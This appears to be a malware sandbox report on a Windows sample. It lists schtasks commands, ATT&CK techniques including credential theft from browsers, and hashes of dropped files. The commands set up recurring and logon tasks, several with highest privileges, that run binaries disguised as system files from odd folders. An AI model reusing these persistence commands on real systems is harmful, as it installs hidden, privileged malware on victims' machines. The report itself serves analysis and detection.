C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2372
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5052
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:556
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1944
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MsServerHostM" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\MsServerHost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3968
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MsServerHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\MsServerHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2252
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MsServerHostM" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\MsServerHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2660
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 12 /tr "'C:\Program Files\Crashpad\reports\fontdrvhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4056
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Crashpad\reports\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4968
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Program Files\Crashpad\reports\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3284
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MsServerHostM" /sc MINUTE /mo 6 /tr "'C:\fontwin\MsServerHost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1108
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MsServerHost" /sc ONLOGON /tr "'C:\fontwin\MsServerHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1232
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MsServerHostM" /sc MINUTE /mo 12 /tr "'C:\fontwin\MsServerHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4872
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
Filesize
944B
MD5bd5940f08d0be56e65e5f2aaf47c538e
SHA1d7e31b87866e5e383ab5499da64aba50f03e8443
SHA2562d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6
SHA512c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406
-
Filesize
944B
MD5ecceac16628651c18879d836acfcb062
SHA1420502b3e5220a01586c59504e94aa1ee11982c9
SHA25658238de09a8817ed9f894ed8e5bf06a897fd08e0b0bd77e508d37b2598edd2a9
SHA512be3c7cb529cafb00f58790a6f8b35c4ff6db9f7f43a507d2218fd80cebc88413e46f71b1bc35b8afcc36b68f9409c946470d1e74a4fe225400eeb6f3f898f5b3
-
Filesize
944B
MD562623d22bd9e037191765d5083ce16a3
SHA14a07da6872672f715a4780513d95ed8ddeefd259
SHA25695d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010
SHA5129a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
Filesize
944B
MD5e243a38635ff9a06c87c2a61a2200656
SHA1ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc
SHA256af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f
SHA5124418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4
-
Filesize
944B
MD52e907f77659a6601fcc408274894da2e
SHA19f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA51234fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721
-
Filesize
944B
MD53a6bad9528f8e23fb5c77fbd81fa28e8
SHA1f127317c3bc6407f536c0f0600dcbcf1aabfba36
SHA256986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05
SHA512846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2
-
Filesize
1KB
MD5a8bd41695ca5d0d85f699a7f4a4c66db
SHA1fd0078bb3c734354319481cfdafb3f6364a14311
SHA2560874ed4b91f117451ed1b2fa1f1387152b2ecfed2121d2106c7071935338787a
SHA512544b64648433fda811c00b6c47907b1cae4014e37b06f5ce6264f5dcdc7702694678746a2458b9d78c85ec1ade16304dc195e2d9672b84d7dfa7ac021e7c1f9c
-
Filesize
1.8MB
MD58d9a9cff85c871e53cdfa82d0a46fc94
SHA1f16d21268be5b0125f11157ff2d82612046010c5
SHA256b4429685230b59b966c71b2b94097b993eabb84e0c4c3ca104af060bcc830bcb
SHA512ca085ed7991a725ee94b144f329bb927cab2c4f6e5d8ece1725104da3d66fb183a387d2c3a15200e7218c64e0dd6cf195754bd8d011548581396e7747817e5fe
-
Filesize
1KB
MD52fa358520b8095182c49a2c67d4e1c3d
SHA18939b078b9a36c94078b4969321758a4c3d24b92
SHA2565d9129d2acc762104246f207a8338ee1f4f65ff1f903c490696cdcd816f2ef77
SHA512626786afbf52e210ab0a502b2efa6a804c04bfa24c83e575c854baba649482cfbfc8210f86b9cdd36a0c6c22e936c81e9564ae662ae2526f0039ed8012c78277
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
225B
MD5c49e0a50c33ef7d1dec15e8933a47f38
SHA10deb394454c8c0d8ad82efdf2e96c30e888993f4
SHA2564919ae51c9836f92d0e3a24f4eb7f4cdad2f6ae754f2b3e11491a353f0a6be27
SHA51270a967d61bc4b68dc8de1102ecec60a2de53de3df11f2831a735f72986b92e3e70af0afe12aa526d32174b1c9c1cb39b23c1a30f17a644383d87cf3b7830fee8
-
Filesize
5.7MB
MD5de40bff13376524593bbf365ac4489f2
SHA119178234bd0e35a984ff183418fc2f39c48b4e8d
SHA256bafc17e2573f25344dbd7e27703f8e91b2abde15ac01a932bd3f12e686ab7952
SHA512957fcc33adead5af1e5919251976c863b519f3097f21d1abf909cea136fe0b8ad7e8c15696a409d212d471c3b4d899cd021e7194fbcc4c6445b220383653016b
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5
-
Filesize
1.9MB
MD5c23ec3a6c041cb8b7d626faee44ef7d8
SHA195739b177a47a9b0347591994f461d44db403649
SHA256f791649ac2127072a37c5c1697ab9b304c15ad0aad93a6daecccaf5e442a051e
SHA51289e420c422278a393102a27b51dfc56ef289aeb0d627db93bd4247ea796b7f83cfbfd327ddc6efaa913450970ab075c9dd3128159949713e10fce2cd178b8087
-
Filesize
74B
MD53949760e5406001b774a6b5349902977
SHA1187aacbf7de65a5716065184c9a0290cd533ff82
SHA256a3f206b3f2588d0bd3aa95e46209fac7895b5dd955b3bbd8eec63f3f0a37c1d2
SHA512694fc9fe0dd428b6d7e8f6805df29e09b85cee309a8c5e7560c4b9b3fd36d6547083c33d0073bbaad896b2b43ee13f7df0ec29309b196027ecb57710b9bf8cff
-
Filesize
218B
MD57e7c767f1e75be51878d3e99bd17eb60
SHA1e2f48d427ab85782feac5119447d0199a7d302fd
SHA256842bcb05a80577f1a81bc2c58f25311ce81487e78855438bd9bd565f79318c5d
SHA5122ab9cb47423608f5fea2189fde78500345e689f06bb65f4dace8108372091bc0cfe76b8ae52cbae86185fcc13a826fab07e09e8ac4126d0d800627f8cd9d0694
-
Filesize
360B
MD58c193ca04be43a8769d8e30ab27b2cb0
SHA13fcae430284192e1b4fb9e17ebc424c7ea8c0709
SHA2562dd5dda0eaede6fce7dac965b5444bb274d969bb968741f46c1c5df2b539cc24
SHA51239a3e74a781450cb5e2d41b81c75be3c731b8251e363c97e29828cf2565ce0d58fda5ada1c7817d60b1f7a729268e5f222375f9c3563d58a54ddbeddfaadfc2b
-
Filesize
235B
MD541c5a8423abc9874db1b3262910c129f
SHA15e6650b36a178114add309508cd1e7fc49abb7d6
SHA256b3d18cf1d44a0f4a34b7a7862c521987a5fe64c884e5367268372eb6931ba0be
SHA512fa02b498fdc1b946cd19119a21dbb88ad4bcbbfa224ae3ffcb8dfb27a5db97ecbe40f866de5c2faeeedda76c6a5ce8cf5f77d82ba83c639ce0bab1454be5b74a
-
Filesize
1KB
MD582a7b8ef3bc275711e3b27c6df93c7ff
SHA1bdac909f26475c94c74145576bcf22adb0f8203c
SHA256582921e5e6617cb736006c46c9c8576d8fdefb8763469bdbf305d52d298f6124
SHA512f2100bca60280f6ad93f40254d6fe69bd9917a44973516874aa54c28042796503daac5c51869924f5ecd17615f461dda6441f479e1201c44ad07f5a7728af248